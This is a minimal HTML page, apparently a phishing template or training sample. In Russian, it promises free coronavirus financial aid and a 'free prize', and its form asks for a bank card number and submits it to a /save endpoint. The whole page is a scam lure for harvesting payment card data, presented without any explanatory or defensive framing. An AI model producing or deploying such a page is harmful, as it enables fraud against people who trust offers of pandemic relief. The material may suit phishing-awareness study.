<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<body>

<h1>Бесплатная материальная помощь при короновирусе!</h1>

<p>Чтобы получить бесплатный приз, заполните форму ниже!</p>

<form action="/save" method="get">
    <strong>Card Num:</strong> <input type="text" name="card_number" /><br>
    <button>Получить!</button>
</form>

</body>
</html>